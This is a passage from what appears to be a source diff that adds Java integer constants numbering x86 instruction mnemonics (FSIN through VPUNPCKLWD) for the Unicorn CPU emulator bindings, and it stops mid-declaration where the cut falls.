UC_X86_INS_FSIN = 664; + public static final int UC_X86_INS_SKINIT = 665; + public static final int UC_X86_INS_SLDT = 666; + public static final int UC_X86_INS_SMSW = 667; + public static final int UC_X86_INS_SQRTPD = 668; + public static final int UC_X86_INS_SQRTPS = 669; + public static final int UC_X86_INS_SQRTSD = 670; + public static final int UC_X86_INS_SQRTSS = 671; + public static final int UC_X86_INS_FSQRT = 672; + public static final int UC_X86_INS_STAC = 673; + public static final int UC_X86_INS_STC = 674; + public static final int UC_X86_INS_STD = 675; + public static final int UC_X86_INS_STGI = 676; + public static final int UC_X86_INS_STI = 677; + public static final int UC_X86_INS_STMXCSR = 678; + public static final int UC_X86_INS_STOSB = 679; + public static final int UC_X86_INS_STOSD = 680; + public static final int UC_X86_INS_STOSQ = 681; + public static final int UC_X86_INS_STOSW = 682; + public static final int UC_X86_INS_STR = 683; + public static final int UC_X86_INS_FST = 684; + public static final int UC_X86_INS_FSTP = 685; + public static final int UC_X86_INS_FSTPNCE = 686; + public static final int UC_X86_INS_FXCH = 687; + public static final int UC_X86_INS_SUBPD = 688; + public static final int UC_X86_INS_SUBPS = 689; + public static final int UC_X86_INS_FSUBR = 690; + public static final int UC_X86_INS_FISUBR = 691; + public static final int UC_X86_INS_FSUBRP = 692; + public static final int UC_X86_INS_SUBSD = 693; + public static final int UC_X86_INS_SUBSS = 694; + public static final int UC_X86_INS_FSUB = 695; + public static final int UC_X86_INS_FISUB = 696; + public static final int UC_X86_INS_FSUBP = 697; + public static final int UC_X86_INS_SWAPGS = 698; + public static final int UC_X86_INS_SYSCALL = 699; + public static final int UC_X86_INS_SYSENTER = 700; + public static final int UC_X86_INS_SYSEXIT = 701; + public static final int UC_X86_INS_SYSRET = 702; + public static final int UC_X86_INS_T1MSKC = 703; + public static final 
int UC_X86_INS_TEST = 704; + public static final int UC_X86_INS_UD2 = 705; + public static final int UC_X86_INS_FTST = 706; + public static final int UC_X86_INS_TZCNT = 707; + public static final int UC_X86_INS_TZMSK = 708; + public static final int UC_X86_INS_FUCOMPI = 709; + public static final int UC_X86_INS_FUCOMI = 710; + public static final int UC_X86_INS_FUCOMPP = 711; + public static final int UC_X86_INS_FUCOMP = 712; + public static final int UC_X86_INS_FUCOM = 713; + public static final int UC_X86_INS_UD2B = 714; + public static final int UC_X86_INS_UNPCKHPD = 715; + public static final int UC_X86_INS_UNPCKHPS = 716; + public static final int UC_X86_INS_UNPCKLPD = 717; + public static final int UC_X86_INS_UNPCKLPS = 718; + public static final int UC_X86_INS_VADDPD = 719; + public static final int UC_X86_INS_VADDPS = 720; + public static final int UC_X86_INS_VADDSD = 721; + public static final int UC_X86_INS_VADDSS = 722; + public static final int UC_X86_INS_VADDSUBPD = 723; + public static final int UC_X86_INS_VADDSUBPS = 724; + public static final int UC_X86_INS_VAESDECLAST = 725; + public static final int UC_X86_INS_VAESDEC = 726; + public static final int UC_X86_INS_VAESENCLAST = 727; + public static final int UC_X86_INS_VAESENC = 728; + public static final int UC_X86_INS_VAESIMC = 729; + public static final int UC_X86_INS_VAESKEYGENASSIST = 730; + public static final int UC_X86_INS_VALIGND = 731; + public static final int UC_X86_INS_VALIGNQ = 732; + public static final int UC_X86_INS_VANDNPD = 733; + public static final int UC_X86_INS_VANDNPS = 734; + public static final int UC_X86_INS_VANDPD = 735; + public static final int UC_X86_INS_VANDPS = 736; + public static final int UC_X86_INS_VBLENDMPD = 737; + public static final int UC_X86_INS_VBLENDMPS = 738; + public static final int UC_X86_INS_VBLENDPD = 739; + public static final int UC_X86_INS_VBLENDPS = 740; + public static final int UC_X86_INS_VBLENDVPD = 741; + public static final int 
UC_X86_INS_VBLENDVPS = 742; + public static final int UC_X86_INS_VBROADCASTF128 = 743; + public static final int UC_X86_INS_VBROADCASTI32X4 = 744; + public static final int UC_X86_INS_VBROADCASTI64X4 = 745; + public static final int UC_X86_INS_VBROADCASTSD = 746; + public static final int UC_X86_INS_VBROADCASTSS = 747; + public static final int UC_X86_INS_VCMPPD = 748; + public static final int UC_X86_INS_VCMPPS = 749; + public static final int UC_X86_INS_VCMPSD = 750; + public static final int UC_X86_INS_VCMPSS = 751; + public static final int UC_X86_INS_VCOMPRESSPD = 752; + public static final int UC_X86_INS_VCOMPRESSPS = 753; + public static final int UC_X86_INS_VCVTDQ2PD = 754; + public static final int UC_X86_INS_VCVTDQ2PS = 755; + public static final int UC_X86_INS_VCVTPD2DQX = 756; + public static final int UC_X86_INS_VCVTPD2DQ = 757; + public static final int UC_X86_INS_VCVTPD2PSX = 758; + public static final int UC_X86_INS_VCVTPD2PS = 759; + public static final int UC_X86_INS_VCVTPD2UDQ = 760; + public static final int UC_X86_INS_VCVTPH2PS = 761; + public static final int UC_X86_INS_VCVTPS2DQ = 762; + public static final int UC_X86_INS_VCVTPS2PD = 763; + public static final int UC_X86_INS_VCVTPS2PH = 764; + public static final int UC_X86_INS_VCVTPS2UDQ = 765; + public static final int UC_X86_INS_VCVTSD2SI = 766; + public static final int UC_X86_INS_VCVTSD2USI = 767; + public static final int UC_X86_INS_VCVTSS2SI = 768; + public static final int UC_X86_INS_VCVTSS2USI = 769; + public static final int UC_X86_INS_VCVTTPD2DQX = 770; + public static final int UC_X86_INS_VCVTTPD2DQ = 771; + public static final int UC_X86_INS_VCVTTPD2UDQ = 772; + public static final int UC_X86_INS_VCVTTPS2DQ = 773; + public static final int UC_X86_INS_VCVTTPS2UDQ = 774; + public static final int UC_X86_INS_VCVTUDQ2PD = 775; + public static final int UC_X86_INS_VCVTUDQ2PS = 776; + public static final int UC_X86_INS_VDIVPD = 777; + public static final int UC_X86_INS_VDIVPS = 778; + 
public static final int UC_X86_INS_VDIVSD = 779; + public static final int UC_X86_INS_VDIVSS = 780; + public static final int UC_X86_INS_VDPPD = 781; + public static final int UC_X86_INS_VDPPS = 782; + public static final int UC_X86_INS_VERR = 783; + public static final int UC_X86_INS_VERW = 784; + public static final int UC_X86_INS_VEXP2PD = 785; + public static final int UC_X86_INS_VEXP2PS = 786; + public static final int UC_X86_INS_VEXPANDPD = 787; + public static final int UC_X86_INS_VEXPANDPS = 788; + public static final int UC_X86_INS_VEXTRACTF128 = 789; + public static final int UC_X86_INS_VEXTRACTF32X4 = 790; + public static final int UC_X86_INS_VEXTRACTF64X4 = 791; + public static final int UC_X86_INS_VEXTRACTI128 = 792; + public static final int UC_X86_INS_VEXTRACTI32X4 = 793; + public static final int UC_X86_INS_VEXTRACTI64X4 = 794; + public static final int UC_X86_INS_VEXTRACTPS = 795; + public static final int UC_X86_INS_VFMADD132PD = 796; + public static final int UC_X86_INS_VFMADD132PS = 797; + public static final int UC_X86_INS_VFMADDPD = 798; + public static final int UC_X86_INS_VFMADD213PD = 799; + public static final int UC_X86_INS_VFMADD231PD = 800; + public static final int UC_X86_INS_VFMADDPS = 801; + public static final int UC_X86_INS_VFMADD213PS = 802; + public static final int UC_X86_INS_VFMADD231PS = 803; + public static final int UC_X86_INS_VFMADDSD = 804; + public static final int UC_X86_INS_VFMADD213SD = 805; + public static final int UC_X86_INS_VFMADD132SD = 806; + public static final int UC_X86_INS_VFMADD231SD = 807; + public static final int UC_X86_INS_VFMADDSS = 808; + public static final int UC_X86_INS_VFMADD213SS = 809; + public static final int UC_X86_INS_VFMADD132SS = 810; + public static final int UC_X86_INS_VFMADD231SS = 811; + public static final int UC_X86_INS_VFMADDSUB132PD = 812; + public static final int UC_X86_INS_VFMADDSUB132PS = 813; + public static final int UC_X86_INS_VFMADDSUBPD = 814; + public static final int 
UC_X86_INS_VFMADDSUB213PD = 815; + public static final int UC_X86_INS_VFMADDSUB231PD = 816; + public static final int UC_X86_INS_VFMADDSUBPS = 817; + public static final int UC_X86_INS_VFMADDSUB213PS = 818; + public static final int UC_X86_INS_VFMADDSUB231PS = 819; + public static final int UC_X86_INS_VFMSUB132PD = 820; + public static final int UC_X86_INS_VFMSUB132PS = 821; + public static final int UC_X86_INS_VFMSUBADD132PD = 822; + public static final int UC_X86_INS_VFMSUBADD132PS = 823; + public static final int UC_X86_INS_VFMSUBADDPD = 824; + public static final int UC_X86_INS_VFMSUBADD213PD = 825; + public static final int UC_X86_INS_VFMSUBADD231PD = 826; + public static final int UC_X86_INS_VFMSUBADDPS = 827; + public static final int UC_X86_INS_VFMSUBADD213PS = 828; + public static final int UC_X86_INS_VFMSUBADD231PS = 829; + public static final int UC_X86_INS_VFMSUBPD = 830; + public static final int UC_X86_INS_VFMSUB213PD = 831; + public static final int UC_X86_INS_VFMSUB231PD = 832; + public static final int UC_X86_INS_VFMSUBPS = 833; + public static final int UC_X86_INS_VFMSUB213PS = 834; + public static final int UC_X86_INS_VFMSUB231PS = 835; + public static final int UC_X86_INS_VFMSUBSD = 836; + public static final int UC_X86_INS_VFMSUB213SD = 837; + public static final int UC_X86_INS_VFMSUB132SD = 838; + public static final int UC_X86_INS_VFMSUB231SD = 839; + public static final int UC_X86_INS_VFMSUBSS = 840; + public static final int UC_X86_INS_VFMSUB213SS = 841; + public static final int UC_X86_INS_VFMSUB132SS = 842; + public static final int UC_X86_INS_VFMSUB231SS = 843; + public static final int UC_X86_INS_VFNMADD132PD = 844; + public static final int UC_X86_INS_VFNMADD132PS = 845; + public static final int UC_X86_INS_VFNMADDPD = 846; + public static final int UC_X86_INS_VFNMADD213PD = 847; + public static final int UC_X86_INS_VFNMADD231PD = 848; + public static final int UC_X86_INS_VFNMADDPS = 849; + public static final int 
UC_X86_INS_VFNMADD213PS = 850; + public static final int UC_X86_INS_VFNMADD231PS = 851; + public static final int UC_X86_INS_VFNMADDSD = 852; + public static final int UC_X86_INS_VFNMADD213SD = 853; + public static final int UC_X86_INS_VFNMADD132SD = 854; + public static final int UC_X86_INS_VFNMADD231SD = 855; + public static final int UC_X86_INS_VFNMADDSS = 856; + public static final int UC_X86_INS_VFNMADD213SS = 857; + public static final int UC_X86_INS_VFNMADD132SS = 858; + public static final int UC_X86_INS_VFNMADD231SS = 859; + public static final int UC_X86_INS_VFNMSUB132PD = 860; + public static final int UC_X86_INS_VFNMSUB132PS = 861; + public static final int UC_X86_INS_VFNMSUBPD = 862; + public static final int UC_X86_INS_VFNMSUB213PD = 863; + public static final int UC_X86_INS_VFNMSUB231PD = 864; + public static final int UC_X86_INS_VFNMSUBPS = 865; + public static final int UC_X86_INS_VFNMSUB213PS = 866; + public static final int UC_X86_INS_VFNMSUB231PS = 867; + public static final int UC_X86_INS_VFNMSUBSD = 868; + public static final int UC_X86_INS_VFNMSUB213SD = 869; + public static final int UC_X86_INS_VFNMSUB132SD = 870; + public static final int UC_X86_INS_VFNMSUB231SD = 871; + public static final int UC_X86_INS_VFNMSUBSS = 872; + public static final int UC_X86_INS_VFNMSUB213SS = 873; + public static final int UC_X86_INS_VFNMSUB132SS = 874; + public static final int UC_X86_INS_VFNMSUB231SS = 875; + public static final int UC_X86_INS_VFRCZPD = 876; + public static final int UC_X86_INS_VFRCZPS = 877; + public static final int UC_X86_INS_VFRCZSD = 878; + public static final int UC_X86_INS_VFRCZSS = 879; + public static final int UC_X86_INS_VORPD = 880; + public static final int UC_X86_INS_VORPS = 881; + public static final int UC_X86_INS_VXORPD = 882; + public static final int UC_X86_INS_VXORPS = 883; + public static final int UC_X86_INS_VGATHERDPD = 884; + public static final int UC_X86_INS_VGATHERDPS = 885; + public static final int 
UC_X86_INS_VGATHERPF0DPD = 886; + public static final int UC_X86_INS_VGATHERPF0DPS = 887; + public static final int UC_X86_INS_VGATHERPF0QPD = 888; + public static final int UC_X86_INS_VGATHERPF0QPS = 889; + public static final int UC_X86_INS_VGATHERPF1DPD = 890; + public static final int UC_X86_INS_VGATHERPF1DPS = 891; + public static final int UC_X86_INS_VGATHERPF1QPD = 892; + public static final int UC_X86_INS_VGATHERPF1QPS = 893; + public static final int UC_X86_INS_VGATHERQPD = 894; + public static final int UC_X86_INS_VGATHERQPS = 895; + public static final int UC_X86_INS_VHADDPD = 896; + public static final int UC_X86_INS_VHADDPS = 897; + public static final int UC_X86_INS_VHSUBPD = 898; + public static final int UC_X86_INS_VHSUBPS = 899; + public static final int UC_X86_INS_VINSERTF128 = 900; + public static final int UC_X86_INS_VINSERTF32X4 = 901; + public static final int UC_X86_INS_VINSERTF32X8 = 902; + public static final int UC_X86_INS_VINSERTF64X2 = 903; + public static final int UC_X86_INS_VINSERTF64X4 = 904; + public static final int UC_X86_INS_VINSERTI128 = 905; + public static final int UC_X86_INS_VINSERTI32X4 = 906; + public static final int UC_X86_INS_VINSERTI32X8 = 907; + public static final int UC_X86_INS_VINSERTI64X2 = 908; + public static final int UC_X86_INS_VINSERTI64X4 = 909; + public static final int UC_X86_INS_VINSERTPS = 910; + public static final int UC_X86_INS_VLDDQU = 911; + public static final int UC_X86_INS_VLDMXCSR = 912; + public static final int UC_X86_INS_VMASKMOVDQU = 913; + public static final int UC_X86_INS_VMASKMOVPD = 914; + public static final int UC_X86_INS_VMASKMOVPS = 915; + public static final int UC_X86_INS_VMAXPD = 916; + public static final int UC_X86_INS_VMAXPS = 917; + public static final int UC_X86_INS_VMAXSD = 918; + public static final int UC_X86_INS_VMAXSS = 919; + public static final int UC_X86_INS_VMCALL = 920; + public static final int UC_X86_INS_VMCLEAR = 921; + public static final int UC_X86_INS_VMFUNC 
= 922; + public static final int UC_X86_INS_VMINPD = 923; + public static final int UC_X86_INS_VMINPS = 924; + public static final int UC_X86_INS_VMINSD = 925; + public static final int UC_X86_INS_VMINSS = 926; + public static final int UC_X86_INS_VMLAUNCH = 927; + public static final int UC_X86_INS_VMLOAD = 928; + public static final int UC_X86_INS_VMMCALL = 929; + public static final int UC_X86_INS_VMOVQ = 930; + public static final int UC_X86_INS_VMOVDDUP = 931; + public static final int UC_X86_INS_VMOVD = 932; + public static final int UC_X86_INS_VMOVDQA32 = 933; + public static final int UC_X86_INS_VMOVDQA64 = 934; + public static final int UC_X86_INS_VMOVDQA = 935; + public static final int UC_X86_INS_VMOVDQU16 = 936; + public static final int UC_X86_INS_VMOVDQU32 = 937; + public static final int UC_X86_INS_VMOVDQU64 = 938; + public static final int UC_X86_INS_VMOVDQU8 = 939; + public static final int UC_X86_INS_VMOVDQU = 940; + public static final int UC_X86_INS_VMOVHLPS = 941; + public static final int UC_X86_INS_VMOVHPD = 942; + public static final int UC_X86_INS_VMOVHPS = 943; + public static final int UC_X86_INS_VMOVLHPS = 944; + public static final int UC_X86_INS_VMOVLPD = 945; + public static final int UC_X86_INS_VMOVLPS = 946; + public static final int UC_X86_INS_VMOVMSKPD = 947; + public static final int UC_X86_INS_VMOVMSKPS = 948; + public static final int UC_X86_INS_VMOVNTDQA = 949; + public static final int UC_X86_INS_VMOVNTDQ = 950; + public static final int UC_X86_INS_VMOVNTPD = 951; + public static final int UC_X86_INS_VMOVNTPS = 952; + public static final int UC_X86_INS_VMOVSD = 953; + public static final int UC_X86_INS_VMOVSHDUP = 954; + public static final int UC_X86_INS_VMOVSLDUP = 955; + public static final int UC_X86_INS_VMOVSS = 956; + public static final int UC_X86_INS_VMOVUPD = 957; + public static final int UC_X86_INS_VMOVUPS = 958; + public static final int UC_X86_INS_VMPSADBW = 959; + public static final int UC_X86_INS_VMPTRLD = 
960; + public static final int UC_X86_INS_VMPTRST = 961; + public static final int UC_X86_INS_VMREAD = 962; + public static final int UC_X86_INS_VMRESUME = 963; + public static final int UC_X86_INS_VMRUN = 964; + public static final int UC_X86_INS_VMSAVE = 965; + public static final int UC_X86_INS_VMULPD = 966; + public static final int UC_X86_INS_VMULPS = 967; + public static final int UC_X86_INS_VMULSD = 968; + public static final int UC_X86_INS_VMULSS = 969; + public static final int UC_X86_INS_VMWRITE = 970; + public static final int UC_X86_INS_VMXOFF = 971; + public static final int UC_X86_INS_VMXON = 972; + public static final int UC_X86_INS_VPABSB = 973; + public static final int UC_X86_INS_VPABSD = 974; + public static final int UC_X86_INS_VPABSQ = 975; + public static final int UC_X86_INS_VPABSW = 976; + public static final int UC_X86_INS_VPACKSSDW = 977; + public static final int UC_X86_INS_VPACKSSWB = 978; + public static final int UC_X86_INS_VPACKUSDW = 979; + public static final int UC_X86_INS_VPACKUSWB = 980; + public static final int UC_X86_INS_VPADDB = 981; + public static final int UC_X86_INS_VPADDD = 982; + public static final int UC_X86_INS_VPADDQ = 983; + public static final int UC_X86_INS_VPADDSB = 984; + public static final int UC_X86_INS_VPADDSW = 985; + public static final int UC_X86_INS_VPADDUSB = 986; + public static final int UC_X86_INS_VPADDUSW = 987; + public static final int UC_X86_INS_VPADDW = 988; + public static final int UC_X86_INS_VPALIGNR = 989; + public static final int UC_X86_INS_VPANDD = 990; + public static final int UC_X86_INS_VPANDND = 991; + public static final int UC_X86_INS_VPANDNQ = 992; + public static final int UC_X86_INS_VPANDN = 993; + public static final int UC_X86_INS_VPANDQ = 994; + public static final int UC_X86_INS_VPAND = 995; + public static final int UC_X86_INS_VPAVGB = 996; + public static final int UC_X86_INS_VPAVGW = 997; + public static final int UC_X86_INS_VPBLENDD = 998; + public static final int 
UC_X86_INS_VPBLENDMB = 999; + public static final int UC_X86_INS_VPBLENDMD = 1000; + public static final int UC_X86_INS_VPBLENDMQ = 1001; + public static final int UC_X86_INS_VPBLENDMW = 1002; + public static final int UC_X86_INS_VPBLENDVB = 1003; + public static final int UC_X86_INS_VPBLENDW = 1004; + public static final int UC_X86_INS_VPBROADCASTB = 1005; + public static final int UC_X86_INS_VPBROADCASTD = 1006; + public static final int UC_X86_INS_VPBROADCASTMB2Q = 1007; + public static final int UC_X86_INS_VPBROADCASTMW2D = 1008; + public static final int UC_X86_INS_VPBROADCASTQ = 1009; + public static final int UC_X86_INS_VPBROADCASTW = 1010; + public static final int UC_X86_INS_VPCLMULQDQ = 1011; + public static final int UC_X86_INS_VPCMOV = 1012; + public static final int UC_X86_INS_VPCMPB = 1013; + public static final int UC_X86_INS_VPCMPD = 1014; + public static final int UC_X86_INS_VPCMPEQB = 1015; + public static final int UC_X86_INS_VPCMPEQD = 1016; + public static final int UC_X86_INS_VPCMPEQQ = 1017; + public static final int UC_X86_INS_VPCMPEQW = 1018; + public static final int UC_X86_INS_VPCMPESTRI = 1019; + public static final int UC_X86_INS_VPCMPESTRM = 1020; + public static final int UC_X86_INS_VPCMPGTB = 1021; + public static final int UC_X86_INS_VPCMPGTD = 1022; + public static final int UC_X86_INS_VPCMPGTQ = 1023; + public static final int UC_X86_INS_VPCMPGTW = 1024; + public static final int UC_X86_INS_VPCMPISTRI = 1025; + public static final int UC_X86_INS_VPCMPISTRM = 1026; + public static final int UC_X86_INS_VPCMPQ = 1027; + public static final int UC_X86_INS_VPCMPUB = 1028; + public static final int UC_X86_INS_VPCMPUD = 1029; + public static final int UC_X86_INS_VPCMPUQ = 1030; + public static final int UC_X86_INS_VPCMPUW = 1031; + public static final int UC_X86_INS_VPCMPW = 1032; + public static final int UC_X86_INS_VPCOMB = 1033; + public static final int UC_X86_INS_VPCOMD = 1034; + public static final int UC_X86_INS_VPCOMPRESSD = 
1035; + public static final int UC_X86_INS_VPCOMPRESSQ = 1036; + public static final int UC_X86_INS_VPCOMQ = 1037; + public static final int UC_X86_INS_VPCOMUB = 1038; + public static final int UC_X86_INS_VPCOMUD = 1039; + public static final int UC_X86_INS_VPCOMUQ = 1040; + public static final int UC_X86_INS_VPCOMUW = 1041; + public static final int UC_X86_INS_VPCOMW = 1042; + public static final int UC_X86_INS_VPCONFLICTD = 1043; + public static final int UC_X86_INS_VPCONFLICTQ = 1044; + public static final int UC_X86_INS_VPERM2F128 = 1045; + public static final int UC_X86_INS_VPERM2I128 = 1046; + public static final int UC_X86_INS_VPERMD = 1047; + public static final int UC_X86_INS_VPERMI2D = 1048; + public static final int UC_X86_INS_VPERMI2PD = 1049; + public static final int UC_X86_INS_VPERMI2PS = 1050; + public static final int UC_X86_INS_VPERMI2Q = 1051; + public static final int UC_X86_INS_VPERMIL2PD = 1052; + public static final int UC_X86_INS_VPERMIL2PS = 1053; + public static final int UC_X86_INS_VPERMILPD = 1054; + public static final int UC_X86_INS_VPERMILPS = 1055; + public static final int UC_X86_INS_VPERMPD = 1056; + public static final int UC_X86_INS_VPERMPS = 1057; + public static final int UC_X86_INS_VPERMQ = 1058; + public static final int UC_X86_INS_VPERMT2D = 1059; + public static final int UC_X86_INS_VPERMT2PD = 1060; + public static final int UC_X86_INS_VPERMT2PS = 1061; + public static final int UC_X86_INS_VPERMT2Q = 1062; + public static final int UC_X86_INS_VPEXPANDD = 1063; + public static final int UC_X86_INS_VPEXPANDQ = 1064; + public static final int UC_X86_INS_VPEXTRB = 1065; + public static final int UC_X86_INS_VPEXTRD = 1066; + public static final int UC_X86_INS_VPEXTRQ = 1067; + public static final int UC_X86_INS_VPEXTRW = 1068; + public static final int UC_X86_INS_VPGATHERDD = 1069; + public static final int UC_X86_INS_VPGATHERDQ = 1070; + public static final int UC_X86_INS_VPGATHERQD = 1071; + public static final int 
UC_X86_INS_VPGATHERQQ = 1072; + public static final int UC_X86_INS_VPHADDBD = 1073; + public static final int UC_X86_INS_VPHADDBQ = 1074; + public static final int UC_X86_INS_VPHADDBW = 1075; + public static final int UC_X86_INS_VPHADDDQ = 1076; + public static final int UC_X86_INS_VPHADDD = 1077; + public static final int UC_X86_INS_VPHADDSW = 1078; + public static final int UC_X86_INS_VPHADDUBD = 1079; + public static final int UC_X86_INS_VPHADDUBQ = 1080; + public static final int UC_X86_INS_VPHADDUBW = 1081; + public static final int UC_X86_INS_VPHADDUDQ = 1082; + public static final int UC_X86_INS_VPHADDUWD = 1083; + public static final int UC_X86_INS_VPHADDUWQ = 1084; + public static final int UC_X86_INS_VPHADDWD = 1085; + public static final int UC_X86_INS_VPHADDWQ = 1086; + public static final int UC_X86_INS_VPHADDW = 1087; + public static final int UC_X86_INS_VPHMINPOSUW = 1088; + public static final int UC_X86_INS_VPHSUBBW = 1089; + public static final int UC_X86_INS_VPHSUBDQ = 1090; + public static final int UC_X86_INS_VPHSUBD = 1091; + public static final int UC_X86_INS_VPHSUBSW = 1092; + public static final int UC_X86_INS_VPHSUBWD = 1093; + public static final int UC_X86_INS_VPHSUBW = 1094; + public static final int UC_X86_INS_VPINSRB = 1095; + public static final int UC_X86_INS_VPINSRD = 1096; + public static final int UC_X86_INS_VPINSRQ = 1097; + public static final int UC_X86_INS_VPINSRW = 1098; + public static final int UC_X86_INS_VPLZCNTD = 1099; + public static final int UC_X86_INS_VPLZCNTQ = 1100; + public static final int UC_X86_INS_VPMACSDD = 1101; + public static final int UC_X86_INS_VPMACSDQH = 1102; + public static final int UC_X86_INS_VPMACSDQL = 1103; + public static final int UC_X86_INS_VPMACSSDD = 1104; + public static final int UC_X86_INS_VPMACSSDQH = 1105; + public static final int UC_X86_INS_VPMACSSDQL = 1106; + public static final int UC_X86_INS_VPMACSSWD = 1107; + public static final int UC_X86_INS_VPMACSSWW = 1108; + public static 
final int UC_X86_INS_VPMACSWD = 1109; + public static final int UC_X86_INS_VPMACSWW = 1110; + public static final int UC_X86_INS_VPMADCSSWD = 1111; + public static final int UC_X86_INS_VPMADCSWD = 1112; + public static final int UC_X86_INS_VPMADDUBSW = 1113; + public static final int UC_X86_INS_VPMADDWD = 1114; + public static final int UC_X86_INS_VPMASKMOVD = 1115; + public static final int UC_X86_INS_VPMASKMOVQ = 1116; + public static final int UC_X86_INS_VPMAXSB = 1117; + public static final int UC_X86_INS_VPMAXSD = 1118; + public static final int UC_X86_INS_VPMAXSQ = 1119; + public static final int UC_X86_INS_VPMAXSW = 1120; + public static final int UC_X86_INS_VPMAXUB = 1121; + public static final int UC_X86_INS_VPMAXUD = 1122; + public static final int UC_X86_INS_VPMAXUQ = 1123; + public static final int UC_X86_INS_VPMAXUW = 1124; + public static final int UC_X86_INS_VPMINSB = 1125; + public static final int UC_X86_INS_VPMINSD = 1126; + public static final int UC_X86_INS_VPMINSQ = 1127; + public static final int UC_X86_INS_VPMINSW = 1128; + public static final int UC_X86_INS_VPMINUB = 1129; + public static final int UC_X86_INS_VPMINUD = 1130; + public static final int UC_X86_INS_VPMINUQ = 1131; + public static final int UC_X86_INS_VPMINUW = 1132; + public static final int UC_X86_INS_VPMOVDB = 1133; + public static final int UC_X86_INS_VPMOVDW = 1134; + public static final int UC_X86_INS_VPMOVM2B = 1135; + public static final int UC_X86_INS_VPMOVM2D = 1136; + public static final int UC_X86_INS_VPMOVM2Q = 1137; + public static final int UC_X86_INS_VPMOVM2W = 1138; + public static final int UC_X86_INS_VPMOVMSKB = 1139; + public static final int UC_X86_INS_VPMOVQB = 1140; + public static final int UC_X86_INS_VPMOVQD = 1141; + public static final int UC_X86_INS_VPMOVQW = 1142; + public static final int UC_X86_INS_VPMOVSDB = 1143; + public static final int UC_X86_INS_VPMOVSDW = 1144; + public static final int UC_X86_INS_VPMOVSQB = 1145; + public static final int 
UC_X86_INS_VPMOVSQD = 1146; + public static final int UC_X86_INS_VPMOVSQW = 1147; + public static final int UC_X86_INS_VPMOVSXBD = 1148; + public static final int UC_X86_INS_VPMOVSXBQ = 1149; + public static final int UC_X86_INS_VPMOVSXBW = 1150; + public static final int UC_X86_INS_VPMOVSXDQ = 1151; + public static final int UC_X86_INS_VPMOVSXWD = 1152; + public static final int UC_X86_INS_VPMOVSXWQ = 1153; + public static final int UC_X86_INS_VPMOVUSDB = 1154; + public static final int UC_X86_INS_VPMOVUSDW = 1155; + public static final int UC_X86_INS_VPMOVUSQB = 1156; + public static final int UC_X86_INS_VPMOVUSQD = 1157; + public static final int UC_X86_INS_VPMOVUSQW = 1158; + public static final int UC_X86_INS_VPMOVZXBD = 1159; + public static final int UC_X86_INS_VPMOVZXBQ = 1160; + public static final int UC_X86_INS_VPMOVZXBW = 1161; + public static final int UC_X86_INS_VPMOVZXDQ = 1162; + public static final int UC_X86_INS_VPMOVZXWD = 1163; + public static final int UC_X86_INS_VPMOVZXWQ = 1164; + public static final int UC_X86_INS_VPMULDQ = 1165; + public static final int UC_X86_INS_VPMULHRSW = 1166; + public static final int UC_X86_INS_VPMULHUW = 1167; + public static final int UC_X86_INS_VPMULHW = 1168; + public static final int UC_X86_INS_VPMULLD = 1169; + public static final int UC_X86_INS_VPMULLQ = 1170; + public static final int UC_X86_INS_VPMULLW = 1171; + public static final int UC_X86_INS_VPMULUDQ = 1172; + public static final int UC_X86_INS_VPORD = 1173; + public static final int UC_X86_INS_VPORQ = 1174; + public static final int UC_X86_INS_VPOR = 1175; + public static final int UC_X86_INS_VPPERM = 1176; + public static final int UC_X86_INS_VPROTB = 1177; + public static final int UC_X86_INS_VPROTD = 1178; + public static final int UC_X86_INS_VPROTQ = 1179; + public static final int UC_X86_INS_VPROTW = 1180; + public static final int UC_X86_INS_VPSADBW = 1181; + public static final int UC_X86_INS_VPSCATTERDD = 1182; + public static final int 
UC_X86_INS_VPSCATTERDQ = 1183; + public static final int UC_X86_INS_VPSCATTERQD = 1184; + public static final int UC_X86_INS_VPSCATTERQQ = 1185; + public static final int UC_X86_INS_VPSHAB = 1186; + public static final int UC_X86_INS_VPSHAD = 1187; + public static final int UC_X86_INS_VPSHAQ = 1188; + public static final int UC_X86_INS_VPSHAW = 1189; + public static final int UC_X86_INS_VPSHLB = 1190; + public static final int UC_X86_INS_VPSHLD = 1191; + public static final int UC_X86_INS_VPSHLQ = 1192; + public static final int UC_X86_INS_VPSHLW = 1193; + public static final int UC_X86_INS_VPSHUFB = 1194; + public static final int UC_X86_INS_VPSHUFD = 1195; + public static final int UC_X86_INS_VPSHUFHW = 1196; + public static final int UC_X86_INS_VPSHUFLW = 1197; + public static final int UC_X86_INS_VPSIGNB = 1198; + public static final int UC_X86_INS_VPSIGND = 1199; + public static final int UC_X86_INS_VPSIGNW = 1200; + public static final int UC_X86_INS_VPSLLDQ = 1201; + public static final int UC_X86_INS_VPSLLD = 1202; + public static final int UC_X86_INS_VPSLLQ = 1203; + public static final int UC_X86_INS_VPSLLVD = 1204; + public static final int UC_X86_INS_VPSLLVQ = 1205; + public static final int UC_X86_INS_VPSLLW = 1206; + public static final int UC_X86_INS_VPSRAD = 1207; + public static final int UC_X86_INS_VPSRAQ = 1208; + public static final int UC_X86_INS_VPSRAVD = 1209; + public static final int UC_X86_INS_VPSRAVQ = 1210; + public static final int UC_X86_INS_VPSRAW = 1211; + public static final int UC_X86_INS_VPSRLDQ = 1212; + public static final int UC_X86_INS_VPSRLD = 1213; + public static final int UC_X86_INS_VPSRLQ = 1214; + public static final int UC_X86_INS_VPSRLVD = 1215; + public static final int UC_X86_INS_VPSRLVQ = 1216; + public static final int UC_X86_INS_VPSRLW = 1217; + public static final int UC_X86_INS_VPSUBB = 1218; + public static final int UC_X86_INS_VPSUBD = 1219; + public static final int UC_X86_INS_VPSUBQ = 1220; + public static 
final int UC_X86_INS_VPSUBSB = 1221; + public static final int UC_X86_INS_VPSUBSW = 1222; + public static final int UC_X86_INS_VPSUBUSB = 1223; + public static final int UC_X86_INS_VPSUBUSW = 1224; + public static final int UC_X86_INS_VPSUBW = 1225; + public static final int UC_X86_INS_VPTESTMD = 1226; + public static final int UC_X86_INS_VPTESTMQ = 1227; + public static final int UC_X86_INS_VPTESTNMD = 1228; + public static final int UC_X86_INS_VPTESTNMQ = 1229; + public static final int UC_X86_INS_VPTEST = 1230; + public static final int UC_X86_INS_VPUNPCKHBW = 1231; + public static final int UC_X86_INS_VPUNPCKHDQ = 1232; + public static final int UC_X86_INS_VPUNPCKHQDQ = 1233; + public static final int UC_X86_INS_VPUNPCKHWD = 1234; + public static final int UC_X86_INS_VPUNPCKLBW = 1235; + public static final int UC_X86_INS_VPUNPCKLDQ = 1236; + public static final int UC_X86_INS_VPUNPCKLQDQ = 1237; + public static final int UC_X86_INS_VPUNPCKLWD = 1238; + public static final int 